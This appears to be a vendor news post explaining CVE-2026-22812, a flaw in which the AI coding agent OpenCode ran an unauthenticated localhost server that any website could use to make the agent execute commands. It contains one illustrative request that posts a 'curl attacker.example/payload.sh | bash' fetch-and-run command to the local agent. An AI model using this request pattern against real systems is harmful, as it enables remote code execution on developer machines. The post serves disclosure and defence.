OpenCode CVE-2026-22812: When AI Coding Tools Become an Attack Surface

Publication date: 2026-01-13
NEWS

Overview

A recently disclosed vulnerability in the AI coding agent OpenCode, tracked as CVE-2026-22812, highlights a growing security concern around AI-assisted developer tools. The issue allowed arbitrary code execution on a user’s system simply by visiting a website, as long as OpenCode was running locally. No user interaction, special configuration, or elevated privileges were required. A closely related follow-up issue was later assigned CVE-2026-22813.

What went wrong

Before version 1.0.216, OpenCode automatically started an unauthenticated HTTP server on localhost whenever the agent was active. Users were given no clear indication that this server was running, and it required no authentication. Because its CORS (Cross-Origin Resource Sharing) configuration was overly permissive, any website open in the user's browser could send requests to this local service.

Because OpenCode is designed to execute commands on behalf of the developer, this effectively meant that a remote website could instruct the local agent to run arbitrary code on the user’s machine.

A simplified example

Conceptually, the attack flow looked like this:

# OpenCode is running locally
localhost:3000  # unauthenticated HTTP server

A malicious website could issue a background request similar to:

POST http://localhost:3000/execute
Content-Type: application/json

{
  "command": "curl attacker.example/payload.sh | bash"
}

No clicks, no prompts, no warnings. As long as OpenCode was running, the command executed with the same permissions as the user. This is why the vulnerability received a high severity score (8.8).

Later versions attempted to mitigate the issue by tightening CORS rules, but the server still ran silently in the background. Only from version 1.1.10 onward was the server disabled by default, and even then without prominent security advisories.

Why this matters beyond OpenCode

OpenCode itself is not widely deployed, but the pattern is becoming common. Modern AI coding assistants are no longer passive libraries. They:

  • Read and write files
  • Execute shell commands
  • Interact with IDEs and build systems
  • Sometimes expose local network services

When such tools rely on insecure defaults, implicit trust, or browser-side controls like CORS as a security boundary, they become an attractive target. In this case, a simple website became a delivery mechanism for remote code execution.

The broader risk is clear: AI agents expand the attack surface of developer machines, often without developers realising it.

BaseFortify analysis and attack flow

BaseFortify has published full technical analyses of both vulnerabilities:

Each CVE report includes a clear technical breakdown, a Q&A section, access to the BaseFortify AI Assistant, and an attack flow graph showing how the CVE maps to underlying CWE weaknesses, CAPEC attack patterns, and MITRE ATT&CK techniques. This approach helps translate abstract vulnerability data into concrete, real-world attack scenarios.

How BaseFortify helps

BaseFortify is designed to make vulnerabilities understandable and actionable. Instead of stopping at severity scores, it shows how an issue can actually be exploited, what an attacker would gain, and where it fits in a broader attack chain.

For organisations using AI tooling, this makes it easier to assess whether a vulnerability is merely theoretical or directly exploitable in their environment. By correlating CVEs with CWE, CAPEC, and MITRE ATT&CK, BaseFortify helps teams reason about risk in attacker terms, not just compliance terms.

Readers can register for free at https://basefortify.eu/register to access CVE reports, attack graphs, and the AI Assistant.

Resources

AI coding assistants are powerful productivity tools, but cases like OpenCode show why they must be treated as first-class security components, not just helpful add-ons.